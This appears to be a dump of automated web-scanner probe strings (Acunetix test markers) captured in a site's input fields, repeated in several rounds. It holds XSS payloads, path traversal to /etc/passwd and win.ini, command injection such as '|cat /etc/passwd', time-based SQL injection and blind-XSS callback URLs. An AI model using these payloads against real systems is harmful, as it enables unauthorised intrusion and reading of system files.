
1

1<video><source onerror="javascript:prompt(911351)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(937402)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(940348))>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<iframe src='data:text/html

1

1

1

1

1<body onload=prompt(988734)>

1

1

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(997220)>

1

1<img src=xyz OnErRor=prompt(978758)>

1

WEB-INF\web.xml

1<img/src=">" onerror=alert(990948)>

1

1

1<ScRiPt%20>prompt(924002)</sCripT>

1

1&lt

1

\xf6<img acu onmouseover=prompt(967008) //\xf6>

1

1

1<input autofocus onfocus=prompt(915085)>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1_6jPkN <ScRiPt >prompt(930542)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9149112*9726521)

1

'+response.write(9149112*9726521)+'

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9149112*9726521)+"

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

../../../../../../../../../../etc/passwd

1

cat /etc/passwd

1

${99198+99660}

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

../../../../../../../../../../etc/passwd.jpg

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1some_inexistent_file_with_long_name%00.jpg

1

1&n963714=v955707

-1

)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

'|'ld

-1)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1))

!(()&&!|*|*|

"|"ld

1

testasp.vulnweb.com

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

ZKvvwVFe'

'"()

^(#$!@#$)(()))******

1

'

pQ82I1j5')

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

'

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

kOfLi4by'))

"

1

"

1

1

1

${@print(md5(acunetix_wvs_security_test))}

-1

/etc/passwd

1

1

||cat /etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1)

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

http://hitjq05VPASXm.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

acunetix_wvs_invalid_filename

1

-1))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

http://www.acunetix.tst

1

1'"()&%<ScRiPt >prompt(923612)</ScRiPt>

1

'"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

JrqrzoMM'

comments

"&dir&"

<!--

'"()&%<ScRiPt >prompt(947158)</ScRiPt>

1

1

PHdNCVso')

|dir

comments/.

1

0vR3Rk9g'))

1_903632

1

1

'|dir

file:///etc/passwd

1

1

"|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

acu7569\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7569

1

1

../../../../../../../../../../boot.ini

acux4198\xc0\xbez1\xc0\xbcz2a\x90bcxuca4198

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(916698)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(965306)</script>

1

1

................windowswin.ini

1<ScRiPt >prompt(948784)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

response.write(9731295*9059454)

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983354></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

'+response.write(9731295*9059454)+'

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(941170)</ScRiPt>

1

"+response.write(9731295*9059454)+"

1

1<video><source onerror="javascript:prompt(938839)">

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

1

../../../../../../../../../../etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977444)"></g></svg>

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<div style=width:expression(prompt(999978))>

"&cat /etc/passwd&"

1

1

1

WEB-INF/web.xml

1

../../../../../../../../../../etc/passwd.jpg

1<iframe src='data:text/html

1

cat /etc/passwd

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

${99528+99742}

1<body onload=prompt(909525)>

1

WEB-INF\web.xml

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

`cat /etc/passwd`

1

-1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(909526)>

)

|cat /etc/passwd#

-1)

1&n959254=v920859

1some_inexistent_file_with_long_name%00.jpg

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

-1))

!(()&&!|*|*|

1<img src=xyz OnErRor=prompt(969897)>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

1

testasp.vulnweb.com

1<img/src=">" onerror=alert(924596)>

"|"ld

^(#$!@#$)(()))******

bii1NetF'

1

1

1

/etc/passwd

1

1<ScRiPt%20>prompt(904187)</sCripT>

Ph4Faw1l')

1

'

1

1

1&lt

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

qzS6PI82'))

'

1

1

"

1

\xf6<img acu onmouseover=prompt(976534) //\xf6>

"

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1<input autofocus onfocus=prompt(932889)>

1

1

${@print(md5(acunetix_wvs_security_test))}

http://hitGPxYT37bP0.bxss.me/

-1)

1

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

comments

&dir

http://www.acunetix.tst

[url=http://www.acunetix.com]website security[/url]

ln1uwDuu'

'"

1

file:///etc/passwd

1'"()&%<ScRiPt >prompt(980260)</ScRiPt>

comments

1

'&dir&'

yQ2S8QVV')

<!--

1_oyMKR <ScRiPt >prompt(954518)</ScRiPt>

1

'"()&%<ScRiPt >prompt(994976)</ScRiPt>

1

1

comments/.

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

1_917938

1

6XgYP7TD'))

1

1

1

1

acu5701\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5701

1

1

WEB-INF/web.xml

|dir

1

1

1

1

acux10218\xc0\xbez1\xc0\xbcz2a\x90bcxuca10218

1

1<ScRiPt >prompt(910222)</ScRiPt>

'|dir

WEB-INF\web.xml

1

1

1<script>prompt(935464)</script>

../../../../../../../../../../windows/win.ini

"|dir

1

1

1

1<ScRiPt >prompt(916527)</ScRiPt>

1

../../../../../../../../../../boot.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?954947></ScRiPt>

1

1

1<ScRiPt >prompt(952433)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1<video><source onerror="javascript:prompt(918985)">

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(954125)"></g></svg>

1

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<div style=width:expression(prompt(974297))>

1

1

1<iframe src='data:text/html

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<body onload=prompt(937014)>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(909501)>

1

1

1

1<img src=xyz OnErRor=prompt(965889)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

response.write(9456134*9283209)

1

&cat /etc/passwd&

1

1<img/src=">" onerror=alert(907675)>

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

'+response.write(9456134*9283209)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt%20>prompt(920867)</sCripT>

../../../../../../../../../../etc/passwd

WEB-INF/web.xml

"+response.write(9456134*9283209)+"

1

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

1

1

1

cat /etc/passwd

\xf6<img acu onmouseover=prompt(933185) //\xf6>

1

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<input autofocus onfocus=prompt(923696)>

1

`cat /etc/passwd`

${100480+99654}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

<a href='http://www.acunetix.com'>website security</a>

|cat /etc/passwd#

-1

1

1

1&n968888=v910683

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

'|'ld

-1)

[url=http://www.acunetix.com]website security[/url]

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

1

1some_inexistent_file_with_long_name%00.jpg

1

-1))

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

1_pdBsM <ScRiPt >prompt(988019)</ScRiPt>

1

1

bKAANSUY'

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

'

1

/etc/passwd

1

testasp.vulnweb.com

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

njEelef7')

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

1

1

1

kp4MVL2w'))

${@print(md5(acunetix_wvs_security_test))}

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

"

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://hitMWQDcMkSQ9.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

-1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

1

-1)

1

http://www.acunetix.tst

file:///etc/passwd

1

1

1

&dir

1

-1))

comments

'&dir&'

1

1'"()&%<ScRiPt >prompt(949739)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

'"

WScWN4SW'

1

comments

<!--

1

'"()&%<ScRiPt >prompt(944453)</ScRiPt>

"&dir&"

comments/.

5CTcPiqD')

WEB-INF/web.xml

1

1

1_906964

WEB-INF\web.xml

1

ZiYwCVK3'))

|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

'|dir

1

1

../../../../../../../../../../boot.ini

1

"|dir

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu10603\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10603

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux9346\xc0\xbez1\xc0\xbcz2a\x90bcxuca9346

1

1

1<ScRiPt >prompt(900221)</ScRiPt>

1

................windowswin.ini

1

1<script>prompt(951210)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(989987)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?933162></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(909008)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(905938)">

1

1

1

&cat /etc/passwd&

1

response.write(9876091*9306762)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(922101)"></g></svg>

1

WEB-INF/web.xml

'+response.write(9876091*9306762)+'

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1<div style=width:expression(prompt(915610))>

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9876091*9306762)+"

WEB-INF\web.xml

"&cat /etc/passwd&"

1

1

1<iframe src='data:text/html

1

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

1

1<body onload=prompt(935521)>

1

1

1

1

if(now()=sysdate(),sleep(7.468),0)/*'XOR(if(now()=sysdate(),sleep(7.468),0))OR'"XOR(if(now()=sysdate(),sleep(7.468),0))OR"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(967402)>

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

(select(0)from(select(sleep(11.202)))v)/*'+(select(0)from(select(sleep(11.202)))v)+'"+(select(0)from(select(sleep(11.202)))v)+"*/

1

1&n926363=v983019

../../../../../../../../../../etc/passwd.jpg

${99610+100093}

1<img src=xyz OnErRor=prompt(939686)>

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

-1

1

'|'ld

1some_inexistent_file_with_long_name%00.jpg

1<img/src=">" onerror=alert(905860)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

)

-1)

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

!(()&&!|*|*|

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(946738)</sCripT>

-1))

'"()

1

1

testasp.vulnweb.com

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&lt

9nelNYIu'

'

1

1

1

'

1

"

TPWYAkQt')

\xf6<img acu onmouseover=prompt(992551) //\xf6>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

"

${@print(md5(acunetix_wvs_security_test))}

1

1

1

lcOrqZY9'))

1

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<input autofocus onfocus=prompt(971869)>

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

-1

1

1

http://hitWtgdgXfftN.bxss.me/

&dir

<a href='http://www.acunetix.com'>website security</a>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

acunetix_wvs_invalid_filename

-1)

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

"&dir&"

-1))

comments

1

http://www.acunetix.tst

1

1_3Dxyh <ScRiPt >prompt(901834)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

'"

comments

1

|dir

u4SRqRNH'

1'"()&%<ScRiPt >prompt(922733)</ScRiPt>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

<!--

1

1

'|dir

1

9jT7ErOX')

comments/.

'"()&%<ScRiPt >prompt(991604)</ScRiPt>

1

1

1

1_913451

1

1

56PHDBTM'))

"|dir

1

1

1

file:///etc/passwd

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

WEB-INF/web.xml

1

1

acu2154\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2154

WEB-INF\web.xml

1

acux8067\xc0\xbez1\xc0\xbcz2a\x90bcxuca8067

1

1

../../../../../../../../../../windows/win.ini

1

1

1<ScRiPt >prompt(983345)</ScRiPt>

../../../../../../../../../../boot.ini

1

1<script>prompt(984903)</script>

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(926919)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?966963></ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(930236)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(951253)">

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

response.write(9137571*9879917)

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939041)"></g></svg>

'+response.write(9137571*9879917)+'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

&cat /etc/passwd&

1

"+response.write(9137571*9879917)+"

1<div style=width:expression(prompt(946669))>

1

1

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<iframe src='data:text/html

1

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

../../../../../../../../../../etc/passwd

1

1<body onload=prompt(993980)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

${100210+99871}

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(944970)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

WEB-INF/web.xml

`cat /etc/passwd`

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=xyz OnErRor=prompt(996802)>

-1

1

../../../../../../../../../../etc/passwd.jpg

1&n911658=v941263

1

|cat /etc/passwd#

1

WEB-INF\web.xml

1some_inexistent_file_with_long_name%00.jpg

1<img/src=">" onerror=alert(998463)>

1

)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

1<ScRiPt%20>prompt(995891)</sCripT>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

!(()&&!|*|*|

1&lt

"|"ld

'"()

1

testasp.vulnweb.com

^(#$!@#$)(()))******

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

RUZGQica'

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(951984) //\xf6>

1

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<input autofocus onfocus=prompt(943426)>

NDSUFFuT')

1

"

'

1

1

1

1

/etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

<a href='http://www.acunetix.com'>website security</a>

SWQ9EBe1'))

1

"

1

1

1

http://hitPAZX8FDqSs.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

acunetix_wvs_invalid_filename

[url=http://www.acunetix.com]website security[/url]

-1

1

||cat /etc/passwd

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

-1)

1_TRxhc <ScRiPt >prompt(900164)</ScRiPt>

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

'"

1

&dir

-1))

1

comments

1

<!--

1'"()&%<ScRiPt >prompt(945138)</ScRiPt>

1

'&dir&'

LJHj6PNO'

1

1

1

'"()&%<ScRiPt >prompt(933804)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments/.

1

1_948532

"&dir&"

cxhHoS1P')

1

1

1

1

1

jt0YEpf9'))

|dir

1

file:///etc/passwd

1

'|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

"|dir

acu10017\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10017

1

WEB-INF/web.xml

1

acux1189\xc0\xbez1\xc0\xbcz2a\x90bcxuca1189

1

1

1<ScRiPt >prompt(971385)</ScRiPt>

WEB-INF\web.xml

1

1

1

1

1<script>prompt(939611)</script>

../../../../../../../../../../windows/win.ini

1

1<ScRiPt >prompt(982185)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?908951></ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(981903)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<video><source onerror="javascript:prompt(979964)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(955924)"></g></svg>

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<div style=width:expression(prompt(986074))>

1

response.write(9094655*9845351)

1

1<iframe src='data:text/html

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

&cat /etc/passwd&

'+response.write(9094655*9845351)+'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<body onload=prompt(904249)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"+response.write(9094655*9845351)+"

'&cat /etc/passwd&'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(936588)>

1

1

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd

1

1<img src=xyz OnErRor=prompt(984281)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF/web.xml

1<img/src=">" onerror=alert(990627)>

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

WEB-INF\web.xml

1<ScRiPt%20>prompt(947203)</sCripT>

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

${99526+100316}

1

1&lt

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

-1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

\xf6<img acu onmouseover=prompt(991418) //\xf6>

1

1

1

1&n955028=v945769

-1)

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<input autofocus onfocus=prompt(926302)>

)

1some_inexistent_file_with_long_name%00.jpg

1

1

<a href='http://www.acunetix.com'>website security</a>

1

-1))

1

"|"ld

!(()&&!|*|*|

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

[url=http://www.acunetix.com]website security[/url]

1

^(#$!@#$)(()))******

JAZMOE9z'

1_hHqdi <ScRiPt >prompt(925044)</ScRiPt>

1

testasp.vulnweb.com

Y6LF9KNN')

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

'"()

wLunYnX8'))

1

'

1

1

1

"

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1

1

1

"

1

1

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

||cat /etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

-1))

&dir

1

http://hitVNdoDuPeL6.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

1

qJVYPleF'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

${@print(md5(acunetix_wvs_security_test))}\

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://www.acunetix.tst

1

comments

'&dir&'

OdBCum6v')

1

'"

1

1

1

3iRS49R9'))

comments

1'"()&%<ScRiPt >prompt(966075)</ScRiPt>

"&dir&"

<!--

file:///etc/passwd

1

1

1

|dir

1

'"()&%<ScRiPt >prompt(959993)</ScRiPt>

comments/.

1

/\../\../\../\../\../\../\../etc/passwd

1

1_992032

1

'|dir

1

1

1

WEB-INF/web.xml

"|dir

1

1

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu2266\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2266

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

